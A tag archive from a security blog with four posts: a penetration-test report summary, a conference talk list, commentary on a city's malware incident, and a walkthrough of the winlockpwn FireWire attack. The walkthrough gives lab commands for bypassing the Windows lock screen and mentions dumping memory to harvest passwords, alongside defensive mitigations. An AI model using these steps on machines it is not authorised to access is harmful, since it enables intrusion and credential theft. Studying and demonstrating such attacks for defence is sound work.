Tag Archives: Hacking

Top 5 Attack Vectors Report: Defend It Before You Hack It

Filed under Defense
Tagged as , , , , , , ,

robot-with-sheild-300x287Each year my team conducts hundreds of Penetration Tests in a wide variety of industries, ranging from Healthcare to Retail, Finance to Manufacturing, and many more. The team analyzed data collected from each of our penetration tests at SecureState since 2011 and found common themes in the methods of compromise utilized to break into organizations and compromise sensitive information. As a result, SecureState has issued a new report that expands on the attack vectors identified and suggests ways organizations can defend themselves against such attack vectors. SecureState’s 2014 Attack Vectors Report revealed the following Top 5 methods of compromise:

  1. Weak Passwords
  2. Web Management Consoles
  3. Missing Patches and System Misconfigurations
  4. Application Vulnerabilities
  5. Social Engineering

The full report is available for download on the SecureState website. I also presented a webinar (watch the replay here) with Defense team lead Robert Miller, expanding on the report’s findings and offering additional advice to organizations on how to defend against these attack vectors. I highly recommend you download this report to see where your organization stands in regards to these attack vectors.

What’s the bottom line?
The current mindset of many organizations is to only react after an attack or breach has already occurred. However, based on our findings and what the current onslaught of recent breaches have shown us, it’s clear that organizations face the same attacks month after month. Rather than be reactive, the defensive mindset needs to change to a proactive one. Consider focusing time, money and resources on your defensive controls before a penetration test occurs.

A penetration test should be your final step to ensure your defense can withstand an attack and to adjust your defenses if necessary. We’ve seen it time and time again where organizations only conduct an annual penetration test and expect that remediating tactical issues from the penetration test will improve their security posture. This needs to stop! Build and test your defensive controls first, then test to see how these controls hold up. Most of these controls are a mix of tactical and strategic, but reactively focused. By taking a proactive stance on defense, your organization will become much more secure and the time, money and resources spent will provide much more value to the business.

Defend it before you hack it.

Cross-posted from the SecureState Blog

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Notacon 7 – Things to Do and Talks to Attend

Filed under Cleveland, Hacking
Tagged as , , , , , , ,

The con that is Notacon is upon us. Notacon is one of the best con’s I have ever attended!  It’s a great mix of hacking, security, art, technology and everything in between.  It’s also small enough to network with others…oh, and its in Cleveland which means its affordable!  Things get started tonight with a free preview beginning at 7pm! Some of the speakers will be giving previews of their talks so go check it out if you can.

Just like previous years, there are some really cool events you need to attend including Whose Slide is it Anyway, the Friday night experience and Blockparty!  This year the lock picking village is sponsored by Cleveland Locksport and be sure to check out Deviant Ollam’s new challenge the Defiant Box. Security Justice will also have a live show at 11pm Friday night in the Notacon Radio room. As for talks, this years lineup looks great!  Here are my picks of talks to attend this year:

Mick Douglas (from PaulDotCom Security Weekly) – U R Doin it Wrong Info Disclosure over P2P Networks
Tiffany Rad – Hacking Your Car: Reverse Engineering Protocols, Legalities and the Right to Repair Act
Brad Smith – Stealing from God!
Emily Schooley – Independent Filmmaking – Bringing Your Ideas from Paper to the Screen, and Everything in Between
Nicolle “rogueclown” Neulist – Hey, Don’t Call That Guy A Noob: Toward a More Welcoming Hacker Community
int eighty – Malicious PDF Analysis
catfood – Why Your Software Project Sucks (and how to make it not suck)
Dead Addict – Hidden Trust relationships, an exploration
Jeff “ghostnomad” Kirsch – The Haiku of Security: Complexity through Simplicity
David Kennedy (rel1k) – The Social-Engineering Toolkit (SET) – Putting cool back into SE

Adrian Crenshaw (IronGeek) – Anti-forensics
James Arlen, Chris Clymer, Mick Douglas, and Brandon Knight – Social Engineering Security Into Your Business
James Arlen, Leigh Honeywell, Tiffany Rad and Jillian Loslo – Hacking The Future: Weaponizing the Next Generation
Melissa Barron – Hacking 73H 0r3g0n 7r41L for the Apple ][
Tom Eston, Chris Clymer, Matthew Neely, The Confused Greenies – Surviving the Zombie Apocalypse (did you see our preview?)
James Arlen – SCADA and ICS for Security Experts: How to avoid cyberdouchery
Eleanor Saitta – Designing the Future of Sex

Also on Saturday night don’t miss Dual Core at 8pm!  I’ll be around at the con hanging out so if you see me stop and say Hi.  See you there!

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Who’s managing information security in your city?

Filed under Network Security
Tagged as , , ,

There was something shocking in my local suburban newspaper today. I opened up to page two and behold…an article that touched on information security! Specifically, the article was about how a small municipal court system in my area had a PC that was infected by an email “virus”. This virus caused a “hard drive to shut down”. Shut down I would assume means the MBR was corrupted or the PC was so bogged down with malware that it had to be rebuilt. Don’t worry, it gets better. The reporter goes on to say that an employee opened an email that had something to do with Nigeria and winning money. Hmmm…Sinowal Trojan perhaps? Regardless, the reporter goes into details from the interview he did with the city “IT manager”. Here are some quotes from the article:

“The court computer system has a small firewall, he said, but the anti-virus on the computer was either non-existent or never upgraded.”

“The IT manager has been trying to bring the city computer systems up to speed. There hasn’t been a system-wide upgrade in years.”

“The employee opened the email because there’s no formal training.”

“One of his goals is to work out a way he can send out software updates, especially anti-virus, to all city computers at night when they aren’t in use.”

I like this one the best…

“The main issue is spending the money for software, licenses and equipment. It’s pretty down-to-earth-basic, he said. “You’ve got to start throwing money around to get it to work.”

Huh? Throw money at the problem…classic. Multiple levels of FAIL right? Oh, if you haven’t figured it out yet…read those quotes again. What would a hacker think about after reading this newspaper article? This court/city computer system is a target rich environment to say the least!

While we could talk all day about how the city could implement a better more cost effective solution to the issues, there are two main problems that I see:

Be careful what you say to the media after an incident
The IT manager gave out way too much information to the media about the problems the city is facing with IT security issues. Just by reading this article someone with bad intentions and a bit of technical skill now knows that the city employs non security aware people and the entire network probably hasn’t been patched in years. This would be even more scary if police and fire computer systems were on the same network! However, the article did point out that police and fire systems are on a separate network. Yet, things don’t look good for the police and fire networks if this same IT manager is running those as well! :-/ Local city government should carefully review all media requests for information about an incident.

Local cities, municipal court systems, fire and police networks are left for dead
This doesn’t surprise me but just like a lot of small businesses, small city governments or suburbs don’t spend the money or have the staff to keep systems patched or up-to-date. Especially in a recession! Your IT guy or contracted support is an easy thing to cut for a city. I would think that most city networks are in worse shape then some home PC networks because of outdated equipment, knowledge and lack of funds. Case in point, I wrote about a potentially dangerous vulnerability that was found on another local city network last year. Luckily this city took the vulnerability seriously, resolved the issue and hopefully improved their security.

Imagine the problems that could happen if police, fire and court systems were breached or compromised. Critical infrastructure like police and fire networks are at serious risk with unsecured systems that are not maintained. As a citizen that lives and works in these cities you should question your local city government about how they maintain and manage their networks. I have an email en route to the mayor of this city that will hopefully help them with some ideas and suggestions to get them back on track. However, I think we may only be scratching the surface of the problem. Lets hope your city takes computer and network security more seriously.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Winlockpwn: More then a Partytrick

Filed under Hacking
Tagged as , , , ,

Fun with FireWire

I have seen a couple blogs posts, articles and even the creator of winlockpwn (the hack/script that allows you to bypass Windows authentication through FireWire) saying that this script is nothing more then a “partytrick”…

“Wow and amaze your friends by magically unlocking a Windows PC without a password!”

While this seems like a fun thing to do at your next party to impress the ladies (ladies that like geeks and slick python scripting of course!)…the truth is that it’s a pretty serious issue. I have to hand it to the the creator of winlockpwn (Adam Boileau aka: Metlstorm) for having such a cool sense of humor about the whole thing and all the media attention he has gotten (he got “slashdotted” when he released the script). On his web site he mentions that “it’s a pity to write code and have no one use it”. Adam, we totally agree!

The No Tech Hacking Phenomenon
Attackers will always use the easiest way to gain access to the network, obtain confidential information, trade secrets, whatever. Since the majority of companies and organizations are locking down their networks it’s becoming more and more popular to use social engineering to bypass physical security controls to gain access to the network. This is called the “No Tech Hacking” phenomenon which is recently popularized by Johnny Long and his book which was recently released (Johnny also gives a great talk on the same topic). No tech hacking involves things like social engineering, dumpster diving, shoulder surfing, tailgating, people watching, etc…I won’t go into a ton of detail about this, read his book if you want to know more. The FireWire authentication bypass hack adds one more tool to the mix in which once you have physical access to a location and a computer, it is almost always game over. Sure, there are other attacks you could do like pop a bootable CD to change the admin password (this is assuming they are not using pre-boot authentication with hard drive encryption), or try and exploit another vulnerability, however, combine the FireWire attack with “no tech” hacking techniques, it just got easier for an organization to get pwned.

Demos and information about winlockpwn
I decided to try winlockpwn out on my own to see how easy it really is. There are a ton of articles out there already but few give you all the details about where this hack originated from and why this isn’t a Microsoft specific issue. There are even videos up on YouTube demonstrating this. I was going to do the same type of demo but felt that screen shots would be just fine. To add to the twisted irony of all this I did record a video demo but couldn’t find my 4-pin to 6-pin FireWire cable to hook up to my Mac to edit the video! Had a 6-pin to 6-pin of course…silly cables. Anyway, lets get right to it and talk about the background of the winlockpwn script and how all of this came about.

Where did winlockpwn come from?
Back in 2006 at the RUXCON convention security researcher Adam Boileau gave a talk called “Hit By A Bus: Physical Access Attacks With FireWire” which was about a “feature” with FireWire that if memory was accessed properly it would bypass Windows authentication. However, the code wasn’t released and according to Adam this was because “Microsoft was a little cagey about exactly whether FireWire memory access was a real security issue or not and we didn’t want to cause any real trouble”. Thats funny…Microsoft being “cagey” about something? More recently, because of the release of a video and paper detailing the “Cold Boot Attack” by a team of Princeton University researchers Adam felt that it was time to release his script (with a little coaxing from the Risky Business podcast folks.

Not a Microsoft Issue!
The inherent issue with FireWire is built into the OHCI 1394 specification. It is important to note that this issue is not a Microsoft problem…rather it’s a “feature” with how FireWire technology requires direct access to the memory of the computer. This is how it’s designed and one of the reasons FireWire is as fast as it is.

How does the attack work?
In its simplest form, the authentication bypass attack involves having two PC’s. The target PC must be running Windows 2000/XP or Vista with FireWire ports (either built in or through a removable PCMCIA FireWire Card) and “locked”. The attacking PC must be running a Linux/Unix variant loaded with the pythonraw1394 library bindings, a romtool (to escentially make your FireWire card an Apple iPod), and the winlockpwn.py script. What makes this attack easy is that you can use a Linux bootable forensics LiveCD called Helix (v1.9) which already has the pythonraw1394 library bindings and the romtool installed. When using the Helix (v1.9) LiveCD all you need is to download the winlockpwn.py script and run the romtool which will emulate the attackers FireWire port as an Apple iPod. To the target machine, it will look like a FireWire Apple iPod is being connected in the Windows device manager. Let the fun begin!

I want to note that not only can you use winlockpwn to unlock a PC but you can also use a tool called 1394memimage which will dump the physical memory of the victim PC to a USB drive. This could be even more valuable since you can then run “strings” and search for anything interesting (passwords, login information, etc…). I won’t go into the details about 1394memimage (and I have yet to try this) but you basically use the same method that I will describe but when you get to the step to run winlockpwn, use 1394memimage. Here is a good, detailed article about this process.

Steps to demo the attack
It might be a good idea to demo this to your management and/or clients so I put together a little demo. Below is my lab setup:

– Desktop with a PCI FireWire Card running fully patched Windows XP SP2 (the victim)
– Laptop with a PCMCIA FireWire card (generic FireWire card, you can find a ton of these on eBay) booted with the Helix LiveCD (v1.9)
– 6-pin to 6-pin FireWire Cable
– USB Thumb Drive w/winlockpwn.py script

1. Boot the laptop with the Helix LiveCD. Next, “lock” the victim desktop. Copy the winlockpwn.py script to the correct directory on the laptop:

cp winlockpwn.py /usr/local/pythonraw1394

Step 1

2. Connect the 6-pin to 6-pin FireWire cable to both PC’s.

3. Load the FireWire bindings and run ./businfo to see if it is loaded (should be port 0).

modprobe raw1394

Click here for a screen shot of this.

4. Reprogram the CSR to mimic an Apple iPod. Run ./businfo again to see if the firewire card now emulates an iPod:

./romtool s 0 ipod.csr

Step 4

Click here to see what businfo looks like with the iPod emulation.

5. Waited for a few seconds for the FireWire/iPod drivers to load on the victim desktop. Finally, run winlockpwn.py. Run winlockpwn with no parameters to see all the options. There are several (one will actually allow you to spawn a command shell right at the login screen!). For this demo, we are just using option 2 (regular non-fast-user-switching). The 0 and the 1 are the port and the node.

./winlockpwn.py 0 1 2

Click here to see what happens when winlockpwn is successful!

6. Press CTRL-ALT-DEL on the victim desktop. You will get a an error message box about an incorrect password. Don’t worry about it and press ENTER. You will then be logged into the Windows desktop, bypassing authentication! Note that you can now lock/unlock the computer as many times as you want as the memory of the machine is “snarfed” until a reboot. Also, something to note is that if you want to do the demo again make sure you uninstall the FireWire drivers that loaded in the Windows device manager before rebooting the box. If not, you will probably have problems getting the hack to work again.

How to protect yourself from winlockpwn?
Well for starters, don’t loose physical access to your PC! That sounds obvious but it goes back to the fact that once an attacker has physical access to your PC it’s pretty much over regardless. However, here are some tips that myself and others are suggesting. Keep in mind, most of these can be circumvented, however a “defense in depth” strategy is always the best way to go:

– Ensure that all sensitive laptops/desktops are using whole disk encryption software with a pre-boot password.
– Disable the standby feature and also hibernate.
– Disable unused ports in the BIOS including bootable USB devices.
– Disable the PCMCIA slots in the Windows device manager (this may cause more problems then it’s worth).
– Don’t purchase laptops/desktops with FireWire ports (do you really need FireWire when you have USB ports?).
– Always secure laptops physically with a cable lock when unattended (depending on your environment).
– Mandate that users shut down their PC’s if they are going to leave a PC unattended for a long period of time.

If you have any more suggestions let us know in the comments.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS